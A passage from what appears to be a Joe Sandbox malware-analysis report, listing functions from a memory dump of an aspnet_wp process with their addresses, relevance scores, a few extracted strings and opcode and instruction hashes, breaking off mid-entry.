Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: f01ceaf292ca456cadc49c932dc232673e13b131c6d254c073640b1cba428aac
Instruction ID: 0ae9a2c94e299db06e46136c224814de48feda040f1db14baa144032579d5b33
Opcode Fuzzy Hash: f01ceaf292ca456cadc49c932dc232673e13b131c6d254c073640b1cba428aac
Instruction Fuzzy Hash: 3E4147B1D0152DABDB21DA60CC84FDEB77DBB85718F0045E5EA08A7140DB709E89CFA8

Function 055597A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 05559870

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 5961af73a789b7c3409ca681a9e0b4991eb9c492c10669bf285c5966499c5ce0
Instruction ID: 586736ad290bb3ab10c12ee5b2f3459cf8b056ef791bd08da0701bf845cde7a0
Opcode Fuzzy Hash: 5961af73a789b7c3409ca681a9e0b4991eb9c492c10669bf285c5966499c5ce0
Instruction Fuzzy Hash: 7C318171710301DFDB259FA99861A76BAF6FB88320F54847BE906DF280FB359880C790

Function 0557705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 055770A4

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: 759c3b9b377e1a81f1f5ff85a6de40a55ed91a146603fc40f1061299c20f9334
Instruction ID: 1abeab233ddab8f1a865d131c8f12ee1f23c6a9d5cf61b8a65d3ac29f05a79d2
Opcode Fuzzy Hash: 759c3b9b377e1a81f1f5ff85a6de40a55ed91a146603fc40f1061299c20f9334
Instruction Fuzzy Hash: 20414631625B558EE721AB68F84EBA93FE0FB40724F14052EFC518E1C0CFB44589EBA1

Function 05507505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 05544622

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 787758d49d5342fbe4c1910c0c3effff99559a01ad784d1d57faa3a66893a39d
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: B6417B75A10616EBDF25DF48C490BFEB7B6FB89705F00445AE946A7280DB30E941CBE1

Function 054D5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 054D50BF

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: f574f0693db8ac5d487604d6befe9429bbf8dbf48ba1e4bb1e3fc7618e24abfe
Instruction ID: ed1fab5bca67aec0e156bfdc096436d253c369bc54e144727a65eba0ee783fe2
Opcode Fuzzy Hash: f574f0693db8ac5d487604d6befe9429bbf8dbf48ba1e4bb1e3fc7618e24abfe
Instruction Fuzzy Hash: 8911B9317086128BEB25891D88746FBF797FB95254F34816BD492CB790EE71DC4287A0

Function 0555106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 055510F7

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: bcd2de0c86d8714a32e819238f6c59fcbba51dbf6f11d4b59053dacdbf4b7dfc
Instruction ID: 253c5ddd73cc0f109739fa00303e5cfce3458722f582a3078aa09831bb9af811
Opcode Fuzzy Hash: bcd2de0c86d8714a32e819238f6c59fcbba51dbf6f11d4b59053dacdbf4b7dfc
Instruction Fuzzy Hash: 682123B1A187449FC310DF1A8845A9BFFE8BBD5B50F004A1FF99096250DBB09404CB92

Function 05568158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56be3676958e8789ffcad9cd1cfe963a7376944b8709eba08c6bb0f31503c5c
Instruction ID: fe209beadb8981542269ceab55c8468f9a29b9cfcf3318f1afea5f7ee541c838
Opcode Fuzzy Hash: e56be3676958e8789ffcad9cd1cfe963a7376944b8709eba08c6bb0f31503c5c
Instruction Fuzzy Hash: F2425D75E002599FDB24CF69C881BEDB7F6BF88301F14819AE949EB241DB34A985CF50

Function 0557A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8edcbb02f67d6d52277820e2e21f9316889d62d200a2c52441b230f34320216d
Instruction ID: acd92891f2946429a9b91e86d3fb573dcc081217b5db466a7312776ef3cb3876
Opcode Fuzzy Hash: 8edcbb02f67d6d52277820e2e21f9316889d62d200a2c52441b230f34320216d
Instruction Fuzzy Hash: BE22F7706186598FDB25CF29E05477AB7F2FF44300F088899E8878F686E735D492CBA4

Function 055916CC Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c86ee25779f013d26009e96060fae0a8a68b2375a9795e9f041754ab004f8d
Instruction ID: 51bd46a474f2a0fc1ba77ca456a0763c000343ef0bbcd7834528e9139c7a55be
Opcode Fuzzy Hash: 94c86ee25779f013d26009e96060fae0a8a68b2375a9795e9f041754ab004f8d
Instruction Fuzzy Hash: 05228F35B04A278FCF1DCF99C490ABAB7B2BF89314B14456DD8569B344DB38A942CB90

Function 054D65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbad1212337fa2c8cfa8a8f352e1ca9b44b58401b23239589a1767f3f7a55326
Instruction ID: dbd28c2ae133665ed524c82d404555c999fe0ebb54cb864085bcb7cfd80d03f3
Opcode Fuzzy Hash: dbad1212337fa2c8cfa8a8f352e1ca9b44b58401b23239589a1767f3f7a55326
Instruction Fuzzy Hash: F1E15D75608341CFC714CF28C590AAAFBE1FF89314F0689AEE8999B351D731E905CBA1

Function 054DD7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc6f611ba1280e32e6f4d3edc12557ead5a67558ed48c29ef6ee6ed4035d051a
Instruction ID: e1a1be200829175b7c26c10e375a3ad6e06aaf2bb9b9bac611e087f76ed1e2c9
Opcode Fuzzy Hash: bc6f611ba1280e32e6f4d3edc12557ead5a67558ed48c29ef6ee6ed4035d051a
Instruction Fuzzy Hash: 64C19271E04616DBDF28CF58C855BAEF7B6FF44310F1482AAE825AB380D775A941CB90

Function 054EF460 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9baf40bcc95507c3b0a04273ab6b4e1128beb6ab8dadd41435d8aedb1c38ba
Instruction ID: 5967d13f14076c8c8899d2f4c394e68ce9409379df8272faeebe60d81de8fc6c
Opcode Fuzzy Hash: 5a9baf40bcc95507c3b0a04273ab6b4e1128beb6ab8dadd41435d8aedb1c38ba
Instruction Fuzzy Hash: 09C10331B05621ABCB24CF28C594BFA77A2FF95706F15419BE8429F3A1E7309946C790

Function 054E0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 6b38872ef387ce85ae9a52a454599e11220077eb0902d132d5c7ca792b6e9387
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 87B11531704645EFDB11DBA4C848BBEBBF6BF84300F18459AD56A97385DB70E942CB90

Function 054F90DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36dce5fc8ffe6b68e4c683d9c2c97dd553060cddffdc9a745e36419661c714b8
Instruction ID: 6b5e3437f1868449b44419aa0858bc24035073f265ce1dcb6f7856397b04a2d1
Opcode Fuzzy Hash: 36dce5fc8ffe6b68e4c683d9c2c97dd553060cddffdc9a745e36419661c714b8
Instruction Fuzzy Hash: 97A16C71A00615AFEB16DFA9CC45FAE7BB9BF45750F010065FA05AB2A0D775EC40CBA0

Function 054CC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a1c1a5d2da905863c74a8b5f1250cce05b119fd6d78b751fc199c33baa65b1
Instruction ID: 64277f13d55e236ec77c3da5835030f7f461fa55c5eecc4359739b3b61e60b9c
Opcode Fuzzy Hash: 15a1c1a5d2da905863c74a8b5f1250cce05b119fd6d78b751fc199c33baa65b1
Instruction Fuzzy Hash: 8FB16E74B002658BDB64DF65C994BF9B7B2BF84700F0485EED51EA7280EB709D86CB24

Function 054FE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0217c373c379fd5060e32cdfc58a31a42f1e92d66682d42669b591b0d4d876f
Instruction ID: 026dc916b920838d37aca6eb5c42696e50a701ebf02ad1abef81939a03bdeec4
Opcode Fuzzy Hash: e0217c373c379fd5060e32cdfc58a31a42f1e92d66682d42669b591b0d4d876f
Instruction Fuzzy Hash: 3FA13A31E046599FEB21CB98C849FEEBBB9FF00714F040166EA05AB2A0D7789D51CBD1

Function 05510185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea6c79c69c895a198f0292e2e5c723ed50bf452836c2d7c51e5cda5aa35bf97d
Instruction ID: 654a2d474bd923cfebf39cbc2d9b0a864eda4362ac75211391f0af459eb2f36a
Opcode Fuzzy Hash: ea6c79c69c895a198f0292e2e5c723ed50bf452836c2d7c51e5cda5aa35bf97d
Instruction Fuzzy Hash: 07A1C070B00616DFEB24CF65C999BBABBB2FF44318F004429EE4597291DB74E851CB94

Function 055A4500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b818062ee8c0045148fe2e392234c6c8acca18d1456ade815894ebe10a334091
Instruction ID: 231fefdeb9585c58321eed3c7a088925b9f418cb46cf48e6d1fd4bbc037a0156
Opcode Fuzzy Hash: b818062ee8c0045148fe2e392234c6c8acca18d1456ade815894ebe10a334091
Instruction Fuzzy Hash: 49A1CD72A04652EFCB11DF98C984B6ABBEAFF48704F01092DF5869B250D7B4E941CB91

Function 055560E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd7b66e2c8a89ea73234abbec19b56310a3f23fb14d86be218968f77ddbc136
Instruction ID: e3bf6e3c2ee7af65cc48444fdc59f43390c16a88c200cac14b5895104853d46f
Opcode Fuzzy Hash: bcd7b66e2c8a89ea73234abbec19b56310a3f23fb14d86be218968f77ddbc136
Instruction Fuzzy Hash: 5591C471E04255AFDF15CFA9D8A4BBEBBB5BF48720F55415AEA10EB340D734E9008BA0

Function 054D9486 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198ce5091f6180d6d1a7095a85d986f0f5288e0f16309c2dc25e585bc51a3dd5
Instruction ID: ea677ffaef8d4711d3c35dd53221426fbe8d8723fe713b2acf95e3965d7e0557
Opcode Fuzzy Hash: 198ce5091f6180d6d1a7095a85d986f0f5288e0f16309c2dc25e585bc51a3dd5
Instruction Fuzzy Hash: 60B14C75A04605CFCF24CF19D0A1AEABBB1FB04394F1445ABE826DB391DB31D842DBA0

Function 054D1131 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32cb3a68ab717d16da424f2e2f875d1009159bb36b4ad86a8d8307c441c11c29
Instruction ID: 9d8dfd969eca6aa6f9bf8b6dbdcd5b9c3beb0b3a1700699f2f8dd8471ad5e8bc
Opcode Fuzzy Hash: 32cb3a68ab717d16da424f2e2f875d1009159bb36b4ad86a8d8307c441c11c29
Instruction Fuzzy Hash: 63B100756083408FD364CF28C590A6AFBF1BF89304F184A6EE89AD7352D771E945CB92

Function 0558B52F Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction ID: 0cbff532247dea2504b39c34b33cbccc5f4129c58cd82f5feae201b0c74858ff
Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction Fuzzy Hash: 3871AB35E0461A9BCF20EF65C491ABEB7FEBF44760F18451AE851FB241E334E9818B90

Function 054FD090 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction ID: 7ec920a7db5fe7ec74763a6bfd07a8b056d2fe0a05580e892cb5eb1d5419bb25
Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction Fuzzy Hash: C7819B72E041199BDF14CF68CA87BEEB7F6FB84304F19856AC81AB7340D631A945CB91

Function 054EC640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5581b7417444bc5b79270b1b11713d611f45428fce2ff92c2c31a3f00924bddd
Instruction ID: 5a74e143cec6c1beebf3bd81e6f92fbe3e2c2d0754313aa75aa37db5abf43af3
Opcode Fuzzy Hash: 5581b7417444bc5b79270b1b11713d611f45428fce2ff92c2c31a3f00924bddd
Instruction Fuzzy Hash: 0871A8B590562ADBCB29CF59C891AFEBBB2FF48701F14451AE846AB350D7309805CBA0

Function 054E260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e839aa4ae953749d83d549ab3a6cf34a07cefdbab8b1f86c22cfac037e25e3
Instruction ID: 5a4337090211a9e060b9aafcbec85ddd2b18bd8d9ce8f1985e5524e41f22d88a
Opcode Fuzzy Hash: a1e839aa4ae953749d83d549ab3a6cf34a07cefdbab8b1f86c22cfac037e25e3
Instruction Fuzzy Hash: 997105797086419FC311DF28C484BBAB7EAFF85311F0485AAE899CB351DBB4D846CB91

Function 0559903E Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b8da283b97416f88c6ac203f395dfb96570cce1e23f01ecc88a416182ceb869
Instruction ID: 7cc59533211f0f7d5b6bfff34da44b8070d385e8343a2e2a9ffa06aef78ec06d
Opcode Fuzzy Hash: 6b8da283b97416f88c6ac203f395dfb96570cce1e23f01ecc88a416182ceb869
Instruction Fuzzy Hash: 76618F71604616AFDB19DF65C888BABBBF9FB88710F00461DF85987240DB38A915CB91

Function 054D7703 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b2f90701f0d4423648b4d5a3cb8275c66064de334b6ebef38b066870475083
Instruction ID: 74b015d613093220aa51935e4002806cedb4cc48ea23bb823f78961927ac3482
Opcode Fuzzy Hash: c1b2f90701f0d4423648b4d5a3cb8275c66064de334b6ebef38b066870475083
Instruction Fuzzy Hash: 41614F75A04606EFDB18DF69C494BADFBB6FF84200F14856FE419A7300DB70A945CBA0

Function 0550B570 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c38c0db470e4772fcbc1e8da75e6bb47ceb786bc2f2b3b252cb4e9d0eecb3a
Instruction ID: 0c36361523e6ca934949d4010c1b9140514deb23872d749452bfd73cddff91a3
Opcode Fuzzy Hash: b8c38c0db470e4772fcbc1e8da75e6bb47ceb786bc2f2b3b252cb4e9d0eecb3a
Instruction Fuzzy Hash: B55125716146419FE721EF65CC95F6B7FA8FB89328F10062EF91187191DB34E805CBA1

Function 0554D5D0 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
Instruction ID: dd3bce44947ec3dd627782a99b5c68c8445588ced59b56c76f4e20561fcca03e
Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
Instruction Fuzzy Hash: CC51C1766042129BCB11EF658C44ABB77F6FF88688F04082AF946C7251E735D856CFE2

Function 054F95DA Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d8617e2171186b7548c4f509c347ead80981a92057b4633f687710547a01cb7
Instruction ID: 49f670356b07b98b658dc7d4df39d613f560d6ca2fd583c9f1031676820690ba
Opcode Fuzzy Hash: 4d8617e2171186b7548c4f509c347ead80981a92057b4633f687710547a01cb7
Instruction Fuzzy Hash: C951BD70A10209AFEF229FA9CD81FEDBBB9FF45340F20412AEA94A7151DB719845DF14

Function 054E3740 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96ed1ba3aafe5d6b93a8a771b7f30e13cd894d938c63c6ad6a11a8ae6f6a89ab
Instruction ID: 62c24d9a40e0ba766481cf28825e468ec2238dc4012f8bf5a4f5d7ce456330ff
Opcode Fuzzy Hash: 96ed1ba3aafe5d6b93a8a771b7f30e13cd894d938c63c6ad6a11a8ae6f6a89ab
Instruction Fuzzy Hash: 2D51E075A04616AFC712CF68C480AEAB7B1FF04711F158AAAE845DB740E734F996CBC0

Function 0550E443 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c7c3ab7bc5332cb10a0ae03162daad79dbf5850d15185e8635d6a6205d1b486
Instruction ID: e53e95729f76a242a7d789c886bcb410dbb49dbbb96c698cf3c36badab146ecd
Opcode Fuzzy Hash: 3c7c3ab7bc5332cb10a0ae03162daad79dbf5850d15185e8635d6a6205d1b486
Instruction Fuzzy Hash: F1515B72200A05DFCB22EFA5C985EAAB7FEFF44784F50086AE542972A0D734E944CB50

Function 054D7152 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38369a76db7f024122e24e18abfee4108f3460108e9e7344b59ce4246d4905c9
Instruction ID: 6f19043f4dcdab36a050ac34d025e16566088835a8f87b5a6200ab2052b1e663
Opcode Fuzzy Hash: 38369a76db7f024122e24e18abfee4108f3460108e9e7344b59ce4246d4905c9
Instruction Fuzzy Hash: 2851E031A04A06EFEB15DF64C959BBEFBB6FF44311F14416AE40693390DB70A902CBA0

Function 054F45B1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction ID: 8756357c404811d4d8fe505322a189a723292a8d4479df6f346c331d5cfd5248
Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction Fuzzy Hash: 2951AD71E0421AABDF15DF98C440BEFBBF5BF44350F04406AEA05AB250DB34DA44CBA4

Function 05563140 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbcd9b7bde2ed579b3b650cc36294569119d7db71d222e2b30ec1e857f9f332c
Instruction ID: d5f0acb240e58097e890489cc10d781700c5be115353ed41075971392dca00f4
Opcode Fuzzy Hash: bbcd9b7bde2ed579b3b650cc36294569119d7db71d222e2b30ec1e857f9f332c
Instruction Fuzzy Hash: 4451BE72608381DFD721CF58C840BAAB7E5FF88714F06892AF8959B250D734ED45CB92

Function 054D51ED Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50cdd79c3acc5b3bb1ca5ff1487c233c5ba8515eae7224a419426c55ab34f34c
Instruction ID: b6e45d321af9234222957bfdfa85243f6f32ddc2ad36f68f1a652986e10ea30d
Opcode Fuzzy Hash: 50cdd79c3acc5b3bb1ca5ff1487c233c5ba8515eae7224a419426c55ab34f34c
Instruction Fuzzy Hash: B7519E31B05215DFDF25DBA9D859BEEF7B5BB04714F00005AD805EB290DBB4A941CBB1

Function 0550F71F Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b132eba3fc1a990b31d971a7c66b8ad5636234d44170662cc8cb3c00dd66864
Instruction ID: fb7bab83931d3e84d9f26959465b9b430e3a580053dccd2113a25fe0437ba645
